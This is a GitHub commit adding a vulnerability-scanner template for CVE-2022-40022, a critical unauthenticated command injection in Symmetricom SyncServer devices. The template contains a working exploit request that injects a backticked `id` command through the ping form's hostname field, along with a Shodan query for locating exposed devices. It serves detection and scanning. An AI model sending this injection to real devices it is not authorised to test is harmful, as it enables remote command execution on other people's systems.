Create CVE-2022-40022.yaml

patch-1
Dhiyaneshwaran 2023-06-22 11:16:36 +05:30 committed by GitHub
parent 0a8e14131c
commit 131e8bfb0c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 47 additions and 0 deletions

View File

@ -0,0 +1,47 @@
id: CVE-2022-40022
info:
name: Symmetricom SyncServer Unauthenticated - Remote Command Execution
author: DhiyaneshDK
severity: critical
description: |
Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.
reference:
- http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-40022
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-40022
metadata:
max-request: 1
shodan-query: html:"Symmetricom SyncServer"
verified: "true"
tags: cve,cve2022,syncserver,rce,unauth
http:
- raw:
- |
POST /controller/ping.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/controller/ping.php
currentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+)"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 302